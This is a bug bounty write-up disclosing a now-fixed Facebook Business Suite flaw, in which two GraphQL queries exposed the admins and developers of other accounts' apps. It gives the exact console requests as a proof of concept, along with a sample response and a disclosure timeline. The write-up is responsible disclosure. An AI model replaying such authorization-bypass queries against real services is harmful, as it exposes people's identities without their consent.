Disclosing assigned users of any facebook applications connected to business account
During the Mid-April 2021, I found a very new looking UI of Facebook Business Suite in one of my test facebook account. So, within a second I found new business assets sections added within it.
While analyzing every requests and responses from network tab of dev tools, I found two graphql queries named “BizKitSettingsAssetAssignedPeopleModalQuery ” and “ BizKitSettingsAssetToUserConnectionListPaginationQuery” were fetching the admin’s list of my page connected to business account. At the time of reporting, call for facebook pages was secured but was vulnerable for the asset type apps.
Based on the given input for the targeted app and linked business id, it was possible to disclose NonBusinessScopedPermittedUser of targeted facebook app.
Proof of concept
Send the GraphQL requests as an AJAX call in the console window.
BizKitSettingsAssetAssignedPeopleModalQuery:
new AsyncRequest('api/graphql/').setData({doc_id:3863660693680109,variables:'{"assetID":"AppID","businessID":"linked_businessID"}'}).send()BizKitSettingsAssetToUserConnectionListPaginationQuery:
new AsyncRequest('api/graphql/').setData({doc_id:5596978093660601,variables:'{"assetID":"AppID","assetPermissionAccessType":null,"businessID":"linked_businessID","count":100,"cursor":null,"searchTerm":null,"id":"AppID"}'}).send()Same responses from above both queries:
{
"data": {
"asset": {
"__typename": "Application",
"__isBusinessConnectedObjectWithPermittedUsers": "Application",
"assigned_users": {
"edges": [
{
"node": {
"__typename": "NonBusinessScopedPermittedUser",
"__isPermittedUser": "NonBusinessScopedPermittedUser",
"name": "Facebook Name",
"__module_operation_BizKitSettingsAssetToUserConnectionListItem_user": {
"__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem_user$normalization.graphql"
},
"__module_component_BizKitSettingsAssetToUserConnectionListItem_user": {
"__dr": "BizKitSettingsAssetToNonBusinessScopedUserConnectionListItem.react"
},
"id": "FBID"
},
"cursor": null
}
],
"page_info": {
"end_cursor": "end_cursor",
"has_next_page": true
}
},
"__isBusinessObjectRenderedInUI": "Application",
"assetID": "AppID",
"assetName": "Facebook App Name",
"assetPicture": "CDN_URL",
"assetType": "APP",
"__isNode": "Application",
"id": "AppID",
"businessAssetType": "APP"
}
},
"extensions": {
"is_final": true
}
}Impact
This could have let a malicious user to disclose any app admins/developers(NonBusinessScopedPermittedUser) list connected to business account.
Timeline
- 22 Apr, 2021— Report Sent to Facebook.
- 22 Apr, 2021 — Triaged after 4 hours of submission.
- 15 July 2021 — Incomplete fix by Facebook.
- 26 Aug, 2021 — Bounty Awarded by Facebook.
- 20 Jan, 2022 — Complete fix by Facebook.
- 27 Jan, 2022 —Double bounty awarded by Facebook for incomplete fix with delay payout bonus.
After multiple duplicates and informative reports, this report turned out to be my first bounty reward from Facebook.
You know that feeling when you get your first bounty ?💰️
Your heart starts racing. You keep going back, chasing that feeling over and over again.🚀
Thanks for reading my write-up 🤗 Happy Hacking 🎭️
Thanks & best regards,
Gtm Mänôz
